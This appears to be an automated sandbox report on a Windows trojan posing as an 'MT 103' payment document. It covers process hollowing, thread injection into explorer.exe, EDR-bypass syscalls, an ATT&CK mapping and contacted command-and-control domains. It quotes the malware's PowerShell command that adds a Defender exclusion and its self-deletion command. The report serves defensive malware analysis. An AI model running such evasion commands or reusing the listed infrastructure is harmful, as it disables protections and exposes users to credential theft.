Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01316B40 mov eax, dword ptr fs:[00000030h]	4_2_01316B40
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134AB40 mov eax, dword ptr fs:[00000030h]	4_2_0134AB40
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01278B50 mov eax, dword ptr fs:[00000030h]	4_2_01278B50
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01334B4B mov eax, dword ptr fs:[00000030h]	4_2_01334B4B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01334B4B mov eax, dword ptr fs:[00000030h]	4_2_01334B4B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01334BB0 mov eax, dword ptr fs:[00000030h]	4_2_01334BB0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01334BB0 mov eax, dword ptr fs:[00000030h]	4_2_01334BB0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290BBE mov eax, dword ptr fs:[00000030h]	4_2_01290BBE
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290BBE mov eax, dword ptr fs:[00000030h]	4_2_01290BBE
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130CBF0 mov eax, dword ptr fs:[00000030h]	4_2_0130CBF0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AEBFC mov eax, dword ptr fs:[00000030h]	4_2_012AEBFC
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01288BF0 mov eax, dword ptr fs:[00000030h]	4_2_01288BF0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01288BF0 mov eax, dword ptr fs:[00000030h]	4_2_01288BF0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01288BF0 mov eax, dword ptr fs:[00000030h]	4_2_01288BF0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A0BCB mov eax, dword ptr fs:[00000030h]	4_2_012A0BCB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A0BCB mov eax, dword ptr fs:[00000030h]	4_2_012A0BCB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A0BCB mov eax, dword ptr fs:[00000030h]	4_2_012A0BCB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132EBD0 mov eax, dword ptr fs:[00000030h]	4_2_0132EBD0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01280BCD mov eax, dword ptr fs:[00000030h]	4_2_01280BCD
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01280BCD mov eax, dword ptr fs:[00000030h]	4_2_01280BCD
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01280BCD mov eax, dword ptr fs:[00000030h]	4_2_01280BCD
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AEA2E mov eax, dword ptr fs:[00000030h]	4_2_012AEA2E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BCA24 mov eax, dword ptr fs:[00000030h]	4_2_012BCA24
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BCA38 mov eax, dword ptr fs:[00000030h]	4_2_012BCA38
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A4A35 mov eax, dword ptr fs:[00000030h]	4_2_012A4A35
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A4A35 mov eax, dword ptr fs:[00000030h]	4_2_012A4A35
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130CA11 mov eax, dword ptr fs:[00000030h]	4_2_0130CA11
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BCA6F mov eax, dword ptr fs:[00000030h]	4_2_012BCA6F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BCA6F mov eax, dword ptr fs:[00000030h]	4_2_012BCA6F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BCA6F mov eax, dword ptr fs:[00000030h]	4_2_012BCA6F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132EA60 mov eax, dword ptr fs:[00000030h]	4_2_0132EA60
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FCA72 mov eax, dword ptr fs:[00000030h]	4_2_012FCA72
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FCA72 mov eax, dword ptr fs:[00000030h]	4_2_012FCA72
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290A5B mov eax, dword ptr fs:[00000030h]	4_2_01290A5B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290A5B mov eax, dword ptr fs:[00000030h]	4_2_01290A5B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286A50 mov eax, dword ptr fs:[00000030h]	4_2_01286A50
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286A50 mov eax, dword ptr fs:[00000030h]	4_2_01286A50
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286A50 mov eax, dword ptr fs:[00000030h]	4_2_01286A50
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286A50 mov eax, dword ptr fs:[00000030h]	4_2_01286A50
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286A50 mov eax, dword ptr fs:[00000030h]	4_2_01286A50
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286A50 mov eax, dword ptr fs:[00000030h]	4_2_01286A50
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286A50 mov eax, dword ptr fs:[00000030h]	4_2_01286A50
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01288AA0 mov eax, dword ptr fs:[00000030h]	4_2_01288AA0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01288AA0 mov eax, dword ptr fs:[00000030h]	4_2_01288AA0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012D6AA4 mov eax, dword ptr fs:[00000030h]	4_2_012D6AA4
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128EA80 mov eax, dword ptr fs:[00000030h]	4_2_0128EA80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128EA80 mov eax, dword ptr fs:[00000030h]	4_2_0128EA80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128EA80 mov eax, dword ptr fs:[00000030h]	4_2_0128EA80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128EA80 mov eax, dword ptr fs:[00000030h]	4_2_0128EA80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128EA80 mov eax, dword ptr fs:[00000030h]	4_2_0128EA80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128EA80 mov eax, dword ptr fs:[00000030h]	4_2_0128EA80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128EA80 mov eax, dword ptr fs:[00000030h]	4_2_0128EA80
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128EA80 mov eax, dword ptr fs:[00000030h]	4_2_0128EA80

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 7_2_008E1AC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_008E1AC3

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe

Network Connect: 185.26.122.70 80

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	NtClose: Indirect: 0x121A56C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	NtQueueApcThread: Indirect: 0x121A4F2			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Memory written: C:\Users\user\Desktop\hbwebdownload - MT 103.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Thread register set: target process: 1028			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 1028			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 8E0000

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process created: C:\Users\user\Desktop\hbwebdownload - MT 103.exe "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"	Jump to behavior

Source: explorer.exe, 00000006.00000002.4536248023.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2087085209.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852394132.0000000009C21000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000006.00000002.4525001967.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2082067127.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.4525001967.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2082067127.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2084227501.0000000004B00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.4525001967.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2082067127.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.4525001967.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2082067127.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000002.4523936040.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2081212306.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Queries volume information: C:\Users\user\Desktop\hbwebdownload - MT 103.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 7_2_008E1975 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_008E1975

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match	File source: 4.2.hbwebdownload - MT 103.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hbwebdownload - MT 103.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: 4.2.hbwebdownload - MT 103.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hbwebdownload - MT 103.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	612 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	612 Process Injection	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	213 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hbwebdownload - MT 103.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeLogger
hbwebdownload - MT 103.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.j88.travel	188.114.96.3	true	true	unknown
www.oko.events	185.26.122.70	true	true	unknown
www.1385.net	103.59.102.59	true	true	unknown
www.orenzoplaybest14.xyz	unknown	unknown	true	unknown
www.ourhealthyourlife.shop	unknown	unknown	true	unknown
www.ridges-freezers-56090.bond	unknown	unknown	true	unknown
www.vto.stream	unknown	unknown	true	unknown
www.etangkhap99.lol	unknown	unknown	true	unknown
www.fbpd.top	unknown	unknown	true	unknown
www.est-life-insurance-2507.today	unknown	unknown	true	unknown
www.nline-courses-classes-lv-1.bond	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J	true	unknown
http://www.oko.events/c24t/?Edg8Tp=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbO0lNj685To&iL30=-ZRd9JBXfLe8q2J	true	unknown
www.ridges-freezers-56090.bond/c24t/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000006.00000002.4535238985.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2087085209.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
